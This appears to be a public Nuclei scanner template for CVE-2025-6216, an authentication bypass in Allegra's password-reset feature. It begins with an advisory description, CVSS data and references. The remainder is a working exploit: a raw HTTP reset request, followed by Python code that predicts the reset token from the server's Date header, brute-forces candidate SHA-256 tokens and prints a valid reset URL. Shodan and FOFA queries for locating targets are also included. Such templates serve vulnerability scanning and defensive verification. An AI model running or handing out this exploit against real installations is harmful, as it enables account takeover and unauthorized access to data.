Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
PoC代码[已公开]
id: CVE-2025-6216
info:
name: Allegra - Authentication Bypass via Predictable Password Reset Token
author: iamnoooob,pdresearch
severity: critical
description: |
Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
impact: |
An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
remediation: |
Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-25-410/
- https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
- https://nvd.nist.gov/vuln/detail/CVE-2025-6216
classification:
epss-score: 0.16633
epss-percentile: 0.94688
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-6216
cwe-id: CWE-640
cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: alltena
product: allegra
shodan-query: http.favicon.hash:"284403119"
fofa-query: icon_hash="284403119"
tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset
variables:
email: "admin@mydomainxxx.com" # Change to a test account
flow: http(1) && code()
http:
- raw:
- |
POST /resetPassword.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=
extractors:
- type: regex
name: date_header
part: header
internal: true
group: 1
regex:
- "Date: (.*)"
matchers-condition: and
matchers:
- type: word
words:
- "emailSent"
- '"success":true'
condition: and
- type: status
status:
- 200
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
import requests
import hashlib,os
import time
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
def get_server_time(response):
date_header = response.headers.get('Date')
if date_header:
return parsedate_to_datetime(date_header)
return None
def main():
BASE_URL = os.getenv("BaseURL")
EMAIL = os.getenv("email")
date_header = os.getenv("date_header")
server_time = parsedate_to_datetime(date_header)
if not server_time:
return
server_time_ms = int(server_time.timestamp() * 1000)
expiry_time_ms = server_time_ms + 28800000
base_expiry_sec = (expiry_time_ms // 1000) * 1000
for ms in range(1000):
candidate_expiry_ms = base_expiry_sec + ms
token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
r = requests.get(test_url, allow_redirects=False)
if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
print(test_url)
return
if __name__ == "__main__":
main()
matchers:
- type: dsl
dsl:
- contains(code_response, "/resetPassword!confirm.action?ctk=")
extractors:
- type: dsl # type of the extractor
dsl:
- '"Reset URL: " + code_response'
# digest: 490a0046304402200a2dbd1ebf25b9e92750ff1d3e50589cd3834c4ae4e0f4567e0e280a8b882f9602203ee81b87653d7d775935569c3698904de2974ca45085d932957f0da0dbaab454:922c64590222798bb761d5b6d8e72950